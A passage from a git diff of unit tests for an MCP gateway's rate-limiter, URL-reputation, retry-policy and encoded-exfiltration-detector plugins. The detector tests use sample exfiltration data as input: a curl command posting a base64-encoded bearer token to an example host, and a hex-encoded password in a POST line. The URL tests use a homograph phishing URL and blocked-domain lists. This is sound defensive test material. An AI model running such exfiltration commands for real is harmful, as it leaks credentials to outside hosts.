ValueError.""" - with pytest.raises(ValueError): - _parse_rate("10m") - - -def test_parse_rate_empty_string_raises(): - """Empty rate string must raise ValueError.""" - with pytest.raises(ValueError): - _parse_rate("") - - -def test_parse_rate_slash_only_raises(): - """Slash-only rate string must raise ValueError.""" - with pytest.raises(ValueError): - _parse_rate("/s") - - -def test_validate_config_redis_url_required(): - """backend='redis' without redis_url must raise ValueError at init.""" - with pytest.raises(ValueError, match="redis_url is required"): - RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[PromptHookType.PROMPT_PRE_FETCH], - config={"by_user": "10/s", "backend": "redis"}, - ) - ) - - -# --------------------------------------------------------------------------- -# Rust tenant_id=None skips tenant dimension (review finding) -# --------------------------------------------------------------------------- - - -@pytest.mark.asyncio -@patch("plugins.rate_limiter.rate_limiter._RUST_AVAILABLE", False) -async def test_tenant_none_skips_by_tenant_dimension(): - """When tenant_id is None, the by_tenant dimension must be skipped entirely.""" - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[PromptHookType.PROMPT_PRE_FETCH], - config={"by_user": "100/s", "by_tenant": "1/s"}, - ) - ) - # tenant_id=None — by_tenant should be skipped, so 2 requests should both pass - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1", tenant_id=None)) - payload = PromptPrehookPayload(prompt_id="p", args={}) - r1 = await plugin.prompt_pre_fetch(payload, ctx) - assert r1.violation is None - r2 = await plugin.prompt_pre_fetch(payload, ctx) - assert r2.violation is None + assert result.continue_processing is True + assert result.violation is None diff --git a/tests/unit/mcpgateway/plugins/plugins/url_reputation/test_url_reputation.py b/tests/unit/mcpgateway/plugins/plugins/url_reputation/test_url_reputation.py index 18d59b3d0e..a446a320a1 100644 --- a/tests/unit/mcpgateway/plugins/plugins/url_reputation/test_url_reputation.py +++ b/tests/unit/mcpgateway/plugins/plugins/url_reputation/test_url_reputation.py @@ -1,41 +1,30 @@ # -*- coding: utf-8 -*- -"""Location: ./tests/unit/mcpgateway/plugins/plugins/url_reputation/test_url_reputation.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 -Authors: Mihai Criveti - -Tests for URLReputationPlugin. -""" +"""Tests for URLReputationPlugin.""" +# Third-Party import pytest -from unittest.mock import MagicMock, patch -from mcpgateway.plugins.framework import ( - PluginConfig, - ResourceHookType, - ResourcePreFetchPayload, -) +# First-Party +from mcpgateway.plugins.framework import PluginConfig, ResourceHookType, ResourcePreFetchPayload +from cpex_url_reputation.url_reputation import URLReputationConfig, URLReputationPlugin -from plugins.url_reputation.url_reputation import URLReputationPlugin, URLReputationConfig -try: - import url_reputation_rust # noqa: F401 - _RUST_AVAILABLE = True -except ImportError: - _RUST_AVAILABLE = False -except Exception: - _RUST_AVAILABLE = False +def _plugin(config: dict) -> URLReputationPlugin: + return URLReputationPlugin( + PluginConfig( + name="urlrep", + kind="cpex_url_reputation.url_reputation.URLReputationPlugin", + hooks=[ResourceHookType.RESOURCE_PRE_FETCH], + config=config, + ) + ) -@pytest.mark.skipif(not _RUST_AVAILABLE, reason="Rust url_reputation plugin not available") @pytest.mark.asyncio async def test_whitelisted_subdomain(): """Subdomains of a whitelisted domain should be allowed.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ + plugin = _plugin( + { "whitelist_domains": ["example.com"], "allowed_patterns": [], "blocked_domains": [], @@ -43,23 +32,18 @@ async def test_whitelisted_subdomain(): "use_heuristic_check": True, "entropy_threshold": 3.5, "block_non_secure_http": True, - }, + } ) - plugin = URLReputationPlugin(config) res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://sub.example.com/login"), None) assert res.violation is None -@pytest.mark.skipif(not _RUST_AVAILABLE, reason="Rust url_reputation plugin not available") @pytest.mark.asyncio async def test_phishing_like_domain_blocked(): """Domains mimicking popular sites but not whitelisted are blocked.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ + plugin = _plugin( + { "whitelist_domains": ["paypal.com"], "allowed_patterns": [], "blocked_domains": [], @@ -67,74 +51,19 @@ async def test_phishing_like_domain_blocked(): "use_heuristic_check": True, "entropy_threshold": 3.5, "block_non_secure_http": True, - }, + } ) - plugin = URLReputationPlugin(config) url = "https://pаypal.com/login" # Cyrillic 'а' res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri=url), None) assert not res.continue_processing - -@pytest.mark.skipif(not _RUST_AVAILABLE, reason="Rust url_reputation plugin not available") @pytest.mark.asyncio -async def test_high_entropy_domain_blocked(): - """Random-looking high-entropy domains should be blocked.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": [], - "allowed_patterns": [], - "blocked_domains": [], - "blocked_patterns": [], - "use_heuristic_check": True, - "entropy_threshold": 3.5, - "block_non_secure_http": True, - }, - ) - plugin = URLReputationPlugin(config) - - url = "https://h7f893jkld90-234.com" - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri=url), None) - assert not res.continue_processing - - -@pytest.mark.skipif(not _RUST_AVAILABLE, reason="Rust url_reputation plugin not available") -@pytest.mark.asyncio -async def test_unicode_homograph_blocked(): - """URLs with unicode homograph attacks should be blocked.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": ["paypal.com"], - "allowed_patterns": [], - "blocked_domains": [], - "blocked_patterns": [], - "use_heuristic_check": True, - "entropy_threshold": 3.5, - "block_non_secure_http": True, - }, - ) - plugin = URLReputationPlugin(config) - - url = "https://pаypal.com/login" # Cyrillic 'а' - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri=url), None) - assert not res.continue_processing - - -@pytest.mark.asyncio -async def test_http_blocked_but_https_allowed_python(): - """Non-HTTPS URLs should be blocked; HTTPS allowed (Python fallback compatible).""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ +async def test_http_blocked_but_https_allowed(): + """Non-HTTPS URLs should be blocked while HTTPS passes.""" + plugin = _plugin( + { "whitelist_domains": [], "allowed_patterns": [], "blocked_domains": [], @@ -142,9 +71,8 @@ async def test_http_blocked_but_https_allowed_python(): "use_heuristic_check": False, "entropy_threshold": 3.5, "block_non_secure_http": True, - }, + } ) - plugin = URLReputationPlugin(config) res_http = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="http://safe.com"), None) res_https = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://safe.com"), None) @@ -153,40 +81,11 @@ async def test_http_blocked_but_https_allowed_python(): assert res_https.continue_processing -@pytest.mark.skipif(not _RUST_AVAILABLE, reason="Rust url_reputation plugin not available") -@pytest.mark.asyncio -async def test_high_entropy_domain_blocked_heuristic(): - """Random-looking high-entropy domains should be blocked (requires Rust heuristics).""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": [], - "allowed_patterns": [], - "blocked_domains": [], - "blocked_patterns": [], - "use_heuristic_check": True, - "entropy_threshold": 2.5, - "block_non_secure_http": True, - }, - ) - plugin = URLReputationPlugin(config) - - url = "https://ajsd9a8sd7a98sda7sd9.com" - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri=url), None) - assert not res.continue_processing - - -@pytest.mark.skipif(not _RUST_AVAILABLE, reason="Rust url_reputation plugin not available") @pytest.mark.asyncio async def test_allowed_pattern_url(): """URLs matching allowed patterns bypass checks.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ + plugin = _plugin( + { "whitelist_domains": [], "allowed_patterns": [r"^https://trusted\.example/.*$"], "blocked_domains": ["malicious.com"], @@ -194,298 +93,37 @@ async def test_allowed_pattern_url(): "use_heuristic_check": True, "entropy_threshold": 3.5, "block_non_secure_http": True, - }, + } ) - plugin = URLReputationPlugin(config) - url = "https://trusted.example/path" - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri=url), None) + res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://trusted.example/path"), None) assert res.continue_processing @pytest.mark.asyncio async def test_blocked_pattern_url(): - """URLs matching blocked patterns are rejected (Python fallback compatible - simple substring match).""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": [], - "allowed_patterns": [], - "blocked_domains": [], - "blocked_patterns": ["admin", "login"], # Simple patterns for Python compatibility - "use_heuristic_check": False, - "entropy_threshold": 3.5, - "block_non_secure_http": False, - }, - ) - plugin = URLReputationPlugin(config) - - url = "https://example.com/admin/dashboard" - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri=url), None) - assert not res.continue_processing - assert res.violation.reason == "Blocked pattern" - - -@pytest.mark.skipif(not _RUST_AVAILABLE, reason="Rust url_reputation plugin not available") -@pytest.mark.asyncio -async def test_internationalized_domain(): - """Test that Punycode domains are correctly handled.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": [], - "allowed_patterns": [], - "blocked_domains": [], - "blocked_patterns": [], - "use_heuristic_check": True, - "entropy_threshold": 3.5, - "block_non_secure_http": True, - }, - ) - plugin = URLReputationPlugin(config) - - url = "https://xn--fsq.com" # punycode representation - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri=url), None) - assert res.continue_processing - - -@pytest.mark.skipif(not _RUST_AVAILABLE, reason="Rust url_reputation plugin not available") -@pytest.mark.asyncio -async def test_mixed_case_domain_allowed(): - """Whitelist with mixed-case entry should bypass blocked_domains for that domain.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": ["Example.COM"], - "allowed_patterns": [], - "blocked_domains": ["example.com"], - "blocked_patterns": [], - "use_heuristic_check": False, - "entropy_threshold": 3.5, - "block_non_secure_http": False, - }, - ) - plugin = URLReputationPlugin(config) - - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://example.com/path"), None) - assert res.continue_processing - - -@pytest.mark.skipif(not _RUST_AVAILABLE, reason="Rust url_reputation plugin not available") -@pytest.mark.asyncio -async def test_url_with_port_allowed(): - """URLs with valid ports should be allowed if everything else is OK.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": [], - "allowed_patterns": [], - "blocked_domains": [], - "blocked_patterns": [], - "use_heuristic_check": True, - "entropy_threshold": 3.5, - "block_non_secure_http": True, - }, - ) - plugin = URLReputationPlugin(config) - - url = "https://example.com:8080/path" - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri=url), None) - assert res.continue_processing - - -# --------------------------------------------------------------------------- -# Python fallback path tests (force _RUST_AVAILABLE=False via mock) -# --------------------------------------------------------------------------- - -_PLUGIN_MODULE = "plugins.url_reputation.url_reputation" - - -@pytest.mark.asyncio -async def test_python_whitelist_bypasses_blocked_domain(): - """Python path: whitelisted domain bypasses blocked_domains check.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": ["example.com"], - "allowed_patterns": [], - "blocked_domains": ["example.com"], - "blocked_patterns": [], - "use_heuristic_check": False, - "entropy_threshold": 3.5, - "block_non_secure_http": False, - }, - ) - with patch(f"{_PLUGIN_MODULE}._RUST_AVAILABLE", False): - plugin = URLReputationPlugin(config) - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://example.com/path"), None) - assert res.continue_processing - - -@pytest.mark.asyncio -async def test_python_whitelisted_subdomain(): - """Python path: subdomains of a whitelisted domain should be allowed.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": ["example.com"], - "allowed_patterns": [], - "blocked_domains": [], - "blocked_patterns": [], - "use_heuristic_check": False, - "entropy_threshold": 3.5, - "block_non_secure_http": True, - }, - ) - with patch(f"{_PLUGIN_MODULE}._RUST_AVAILABLE", False): - plugin = URLReputationPlugin(config) - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://sub.example.com/path"), None) - assert res.continue_processing - assert res.violation is None - - -@pytest.mark.asyncio -async def test_python_http_allowed_when_not_enforced(): - """Python path: HTTP URLs are allowed when block_non_secure_http is False.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ + """URLs matching blocked patterns are rejected.""" + plugin = _plugin( + { "whitelist_domains": [], "allowed_patterns": [], "blocked_domains": [], - "blocked_patterns": [], + "blocked_patterns": ["admin", "login"], "use_heuristic_check": False, "entropy_threshold": 3.5, "block_non_secure_http": False, - }, - ) - with patch(f"{_PLUGIN_MODULE}._RUST_AVAILABLE", False): - plugin = URLReputationPlugin(config) - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="http://safe.com/page"), None) - assert res.continue_processing - - -@pytest.mark.asyncio -async def test_python_clean_url_passes_all_checks(): - """Python path: a clean HTTPS URL with no matches passes all checks.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": [], - "allowed_patterns": [], - "blocked_domains": ["evil.com"], - "blocked_patterns": ["malware"], - "use_heuristic_check": False, - "entropy_threshold": 3.5, - "block_non_secure_http": True, - }, + } ) - with patch(f"{_PLUGIN_MODULE}._RUST_AVAILABLE", False): - plugin = URLReputationPlugin(config) - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://safe.example.com/path"), None) - assert res.continue_processing - assert res.violation is None - -@pytest.mark.asyncio -async def test_python_blocked_pattern_substring(): - """Python path: blocked_patterns uses substring matching (not regex).""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": [], - "allowed_patterns": [], - "blocked_domains": [], - "blocked_patterns": ["phishing"], - "use_heuristic_check": False, - "entropy_threshold": 3.5, - "block_non_secure_http": False, - }, - ) - with patch(f"{_PLUGIN_MODULE}._RUST_AVAILABLE", False): - plugin = URLReputationPlugin(config) - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://example.com/phishing-page"), None) + res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://example.com/admin/dashboard"), None) assert not res.continue_processing assert res.violation.reason == "Blocked pattern" -@pytest.mark.asyncio -async def test_python_allowed_patterns_not_honored(): - """Python path: allowed_patterns are not implemented in Python fallback.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": [], - "allowed_patterns": ["trusted"], - "blocked_domains": [], - "blocked_patterns": ["trusted"], - "use_heuristic_check": False, - "entropy_threshold": 3.5, - "block_non_secure_http": False, - }, - ) - with patch(f"{_PLUGIN_MODULE}._RUST_AVAILABLE", False): - plugin = URLReputationPlugin(config) - # In Python fallback, allowed_patterns are not checked, so blocked_patterns will block - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://trusted.example.com/path"), None) - assert not res.continue_processing - - -@pytest.mark.asyncio -async def test_rust_error_fallback_blocks_url(): - """When Rust plugin raises an exception, URL should be blocked for security.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ - "whitelist_domains": [], - "allowed_patterns": [], - "blocked_domains": [], - "blocked_patterns": [], - "use_heuristic_check": False, - "entropy_threshold": 3.5, - "block_non_secure_http": False, - }, - ) - mock_rust = MagicMock() - mock_rust.validate_url_py.side_effect = RuntimeError("Rust engine crashed") - with patch(f"{_PLUGIN_MODULE}._RUST_AVAILABLE", True), \ - patch(f"{_PLUGIN_MODULE}.URLReputationPluginRust", return_value=mock_rust, create=True): - plugin = URLReputationPlugin(config) - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://example.com"), None) - assert not res.continue_processing - assert res.violation.reason == "Rust validation failure" - assert res.violation.code == "URL_REPUTATION_BLOCK" - - @pytest.mark.asyncio async def test_config_normalize_domains_empty(): """URLReputationConfig normalizes empty domain sets correctly.""" - cfg = URLReputationConfig( - whitelist_domains=set(), - blocked_domains=set(), - ) + cfg = URLReputationConfig(whitelist_domains=set(), blocked_domains=set()) assert cfg.whitelist_domains == set() assert cfg.blocked_domains == set() @@ -493,10 +131,7 @@ async def test_config_normalize_domains_empty(): @pytest.mark.asyncio async def test_config_normalize_domains_none(): """URLReputationConfig normalizes None domain sets to empty sets.""" - cfg = URLReputationConfig( - whitelist_domains=None, - blocked_domains=None, - ) + cfg = URLReputationConfig(whitelist_domains=None, blocked_domains=None) assert cfg.whitelist_domains == set() assert cfg.blocked_domains == set() @@ -513,13 +148,10 @@ async def test_config_normalize_domains_mixed_case(): @pytest.mark.asyncio -async def test_python_blocked_domain(): - """Python path: URLs on blocked domains are rejected.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ +async def test_blocked_domain(): + """URLs on blocked domains are rejected.""" + plugin = _plugin( + { "whitelist_domains": [], "allowed_patterns": [], "blocked_domains": ["bad.com"], @@ -527,23 +159,19 @@ async def test_python_blocked_domain(): "use_heuristic_check": False, "entropy_threshold": 3.5, "block_non_secure_http": False, - }, + } ) - with patch(f"{_PLUGIN_MODULE}._RUST_AVAILABLE", False): - plugin = URLReputationPlugin(config) - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://bad.com/path"), None) + + res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://bad.com/path"), None) assert not res.continue_processing assert res.violation.reason == "Blocked domain" @pytest.mark.asyncio -async def test_python_subdomain_of_blocked_domain(): - """Python path: subdomains of blocked domains are also rejected.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ +async def test_subdomain_of_blocked_domain(): + """Subdomains of blocked domains are also rejected.""" + plugin = _plugin( + { "whitelist_domains": [], "allowed_patterns": [], "blocked_domains": ["bad.com"], @@ -551,23 +179,19 @@ async def test_python_subdomain_of_blocked_domain(): "use_heuristic_check": False, "entropy_threshold": 3.5, "block_non_secure_http": False, - }, + } ) - with patch(f"{_PLUGIN_MODULE}._RUST_AVAILABLE", False): - plugin = URLReputationPlugin(config) - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://api.bad.com/v1"), None) + + res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://api.bad.com/v1"), None) assert not res.continue_processing assert res.violation.reason == "Blocked domain" @pytest.mark.asyncio -async def test_python_case_insensitive_whitelist(): - """Python path: whitelist matching is case-insensitive after normalization.""" - config = PluginConfig( - name="urlrep", - kind="plugins.url_reputation.url_reputation.URLReputationPlugin", - hooks=[ResourceHookType.RESOURCE_PRE_FETCH], - config={ +async def test_case_insensitive_whitelist(): + """Whitelist matching should be case-insensitive after normalization.""" + plugin = _plugin( + { "whitelist_domains": ["Example.COM"], "allowed_patterns": [], "blocked_domains": [], @@ -575,9 +199,8 @@ async def test_python_case_insensitive_whitelist(): "use_heuristic_check": False, "entropy_threshold": 3.5, "block_non_secure_http": True, - }, + } ) - with patch(f"{_PLUGIN_MODULE}._RUST_AVAILABLE", False): - plugin = URLReputationPlugin(config) - res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://example.com/path"), None) + + res = await plugin.resource_pre_fetch(ResourcePreFetchPayload(uri="https://example.com/path"), None) assert res.continue_processing diff --git a/tests/unit/mcpgateway/services/test_tool_service.py b/tests/unit/mcpgateway/services/test_tool_service.py index 1d663b3865..4400168fab 100644 --- a/tests/unit/mcpgateway/services/test_tool_service.py +++ b/tests/unit/mcpgateway/services/test_tool_service.py @@ -34,6 +34,7 @@ from mcpgateway.plugins.framework.models import PluginResult from mcpgateway.schemas import AuthenticationValues, ToolCreate, ToolRead, ToolUpdate from mcpgateway.services.tool_service import ( + _build_retry_policy_config, _decrypt_tool_header_value, _decrypt_tool_headers_for_runtime, _encrypt_tool_header_value, @@ -7140,6 +7141,143 @@ async def test_prepare_rust_mcp_tool_execution_post_invoke_hooks_force_fallback( assert plan == {"eligible": False, "fallbackReason": "post-invoke-hooks-configured"} + def test_build_rust_native_tool_post_invoke_retry_policy_from_cpex_package(self, tool_service): + """RetryWithBackoffPlugin should produce a native retry policy when the package is installed.""" + mock_hook_ref = MagicMock() + mock_hook_ref.plugin_ref.name = "RetryWithBackoffPlugin" + mock_hook_ref.plugin_ref.mode = PluginMode.ENFORCE + mock_hook_ref.plugin_ref.conditions = None + mock_hook_ref.plugin_ref.plugin.config.config = { + "max_retries": settings.max_tool_retries + 5, + "backoff_base_ms": 250, + "max_backoff_ms": 5000, + "retry_on_status": [429, 503], + "jitter": False, + "tool_overrides": {"tool-one": {"max_retries": 1, "backoff_base_ms": 75}}, + } + + mock_registry = MagicMock() + mock_registry.get_hook_refs_for_hook.return_value = [mock_hook_ref] + + mock_pm = MagicMock() + mock_pm.has_hooks_for.return_value = True + mock_pm._registry = mock_registry + + policy, requires_python_fallback = tool_service._build_rust_native_tool_post_invoke_retry_policy( + mock_pm, + "tool-one", + None, + ) + + assert requires_python_fallback is False + assert policy == { + "kind": "retry_with_backoff", + "maxRetries": 1, + "backoffBaseMs": 75, + "maxBackoffMs": 5000, + "retryOnStatus": [429, 503], + "jitter": False, + } + + def test_build_rust_native_tool_post_invoke_retry_policy_falls_back_for_invalid_override(self, tool_service): + """Invalid retry config should force Python fallback.""" + mock_hook_ref = MagicMock() + mock_hook_ref.plugin_ref.name = "RetryWithBackoffPlugin" + mock_hook_ref.plugin_ref.mode = PluginMode.ENFORCE + mock_hook_ref.plugin_ref.conditions = None + mock_hook_ref.plugin_ref.plugin.config.config = {"max_retries": 3, "tool_overrides": {"tool-one": "invalid"}} + + mock_registry = MagicMock() + mock_registry.get_hook_refs_for_hook.return_value = [mock_hook_ref] + + mock_pm = MagicMock() + mock_pm.has_hooks_for.return_value = True + mock_pm._registry = mock_registry + + policy, requires_python_fallback = tool_service._build_rust_native_tool_post_invoke_retry_policy( + mock_pm, + "tool-one", + None, + ) + + assert policy is None + assert requires_python_fallback is True + + def test_build_retry_policy_config_parses_bool_like_values_and_clamps_override(self): + """Gateway-owned retry parser should keep bool-like semantics and override clamping.""" + cfg = _build_retry_policy_config( + { + "jitter": "false", + "check_text_content": "0", + "tool_overrides": { + "tool-one": { + "max_retries": settings.max_tool_retries + 4, + "check_text_content": "true", + } + }, + }, + "tool-one", + ) + + assert cfg["jitter"] is False + assert cfg["check_text_content"] is True + assert cfg["max_retries"] == settings.max_tool_retries + + def test_build_retry_policy_config_rejects_scalar_retry_status_string(self): + """Scalar retry_on_status strings should fail instead of being split into digits.""" + with pytest.raises(ValueError, match="retry_on_status"): + _build_retry_policy_config({"retry_on_status": "429"}, "tool-one") + + def test_build_retry_policy_config_accepts_numeric_bool_inputs(self): + """Numeric bool-like inputs should preserve 0/1 semantics.""" + cfg = _build_retry_policy_config({"jitter": 0, "check_text_content": 1}, "tool-one") + assert cfg["jitter"] is False + assert cfg["check_text_content"] is True + + def test_build_retry_policy_config_rejects_negative_retry_values(self): + """Negative integer-like retry settings should be rejected.""" + with pytest.raises(ValueError, match=">= 0"): + _build_retry_policy_config({"max_retries": -1}, "tool-one") + + def test_build_retry_policy_config_rejects_invalid_bool_values(self): + """Unknown bool-like strings should be rejected.""" + with pytest.raises(ValueError, match="bool-like"): + _build_retry_policy_config({"jitter": "maybe"}, "tool-one") + + def test_build_retry_policy_config_rejects_non_mapping_config(self): + """Top-level retry config must stay mapping-shaped.""" + with pytest.raises(ValueError, match="must be a mapping"): + _build_retry_policy_config(["not", "a", "mapping"], "tool-one") + + def test_build_retry_policy_config_rejects_non_mapping_tool_overrides(self): + """tool_overrides must be a mapping.""" + with pytest.raises(ValueError, match="tool_overrides must be a mapping"): + _build_retry_policy_config({"tool_overrides": ["bad"]}, "tool-one") + + def test_build_rust_native_tool_post_invoke_retry_policy_falls_back_for_text_check_override(self, tool_service): + """Text-content inspection in an override should force Python fallback.""" + mock_hook_ref = MagicMock() + mock_hook_ref.plugin_ref.name = "RetryWithBackoffPlugin" + mock_hook_ref.plugin_ref.mode = PluginMode.ENFORCE + mock_hook_ref.plugin_ref.conditions = None + mock_hook_ref.plugin_ref.plugin.config.config = {"tool_overrides": {"tool-one": {"check_text_content": "true"}}} + + mock_registry = MagicMock() + mock_registry.get_hook_refs_for_hook.return_value = [mock_hook_ref] + + mock_pm = MagicMock() + mock_pm.has_hooks_for.return_value = True + mock_pm._registry = mock_registry + + policy, requires_python_fallback = tool_service._build_rust_native_tool_post_invoke_retry_policy( + mock_pm, + "tool-one", + None, + ) + + assert policy is None + assert requires_python_fallback is True + @pytest.mark.asyncio async def test_prepare_rust_mcp_tool_execution_trace_id_forces_fallback(self, tool_service): """Active observability trace should bypass Rust direct execution.""" diff --git a/tests/unit/plugins/test_encoded_exfil_detector.py b/tests/unit/plugins/test_encoded_exfil_detector.py index e633fbc409..c92a1c2c71 100644 --- a/tests/unit/plugins/test_encoded_exfil_detector.py +++ b/tests/unit/plugins/test_encoded_exfil_detector.py @@ -4,7 +4,6 @@ # Standard import base64 import logging -import os # Third-Party from pydantic import ValidationError @@ -22,7 +21,7 @@ ToolPostInvokePayload, ) from mcpgateway.plugins.framework.hooks.resources import ResourceHookType -from plugins.encoded_exfil_detection.encoded_exfil_detector import ( +from cpex_encoded_exfil_detection.encoded_exfil_detection import ( _decode_candidate, _has_egress_context, _normalize_padding, @@ -33,110 +32,91 @@ EncodedExfilDetectorPlugin, ) -# Optional Rust extension -try: - # Third-Party - from encoded_exfil_detection_rust.encoded_exfil_detection_rust import py_scan_container as encoded_exfil_detection_rust # noqa: F401 - - RUST_AVAILABLE = True -except ImportError: - RUST_AVAILABLE = False - # Fail in CI if Rust plugins are required - if os.environ.get("REQUIRE_RUST") == "1": - raise ImportError("Rust plugin 'encoded_exfil_detection' is required in CI but not available") - - -@pytest.mark.parametrize( - "use_rust", - [ - pytest.param(False, id="python"), - pytest.param(True, marks=pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available"), id="rust"), - ], -) + class TestEncodedDetectionScan: - """Validate scanner behavior in Python and optional Rust modes.""" + """Validate scanner behavior for the packaged detector.""" - def test_detects_base64_sensitive_payload(self, use_rust: bool): + def test_detects_base64_sensitive_payload(self): cfg = EncodedExfilDetectorConfig() encoded = base64.b64encode(b"authorization: bearer super-secret-token-value").decode() payload = {"body": f"curl -d '{encoded}' https://example.com/hook"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1 assert any(f.get("encoding") in {"base64", "base64url"} for f in findings) - def test_detects_hex_payload(self, use_rust: bool): + def test_detects_hex_payload(self): cfg = EncodedExfilDetectorConfig() encoded_hex = b"password=secret-value-for-upload".hex() payload = {"blob": f"POST /collect data={encoded_hex}"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1 assert any(f.get("encoding") == "hex" for f in findings) - def test_redacts_when_enabled(self, use_rust: bool): + def test_redacts_when_enabled(self): cfg = EncodedExfilDetectorConfig(redact=True, redaction_text="[ENCODED]", block_on_detection=False) encoded = base64.b64encode(b"api_key=secret-token-value").decode() - count, redacted, findings = _scan_container({"value": encoded}, cfg, use_rust=use_rust) + count, redacted, findings = _scan_container({"value": encoded}, cfg) assert count >= 1 assert len(findings) >= 1 assert redacted["value"] == "[ENCODED]" - def test_clean_input_no_findings(self, use_rust: bool): + def test_clean_input_no_findings(self): cfg = EncodedExfilDetectorConfig() payload = {"message": "normal conversational text without encoded payloads"} - count, redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, redacted, findings = _scan_container(payload, cfg) assert count == 0 assert findings == [] assert redacted == payload - def test_base64_with_word_boundaries(self, use_rust: bool): + def test_base64_with_word_boundaries(self): """Test that base64 patterns correctly match at word boundaries.""" cfg = EncodedExfilDetectorConfig() # Should detect: base64 with spaces around it encoded = base64.b64encode(b"authorization: bearer secret-token-value").decode() payload1 = {"text": f"data {encoded} end"} - count1, _, findings1 = _scan_container(payload1, cfg, use_rust=use_rust) + count1, _, findings1 = _scan_container(payload1, cfg) assert 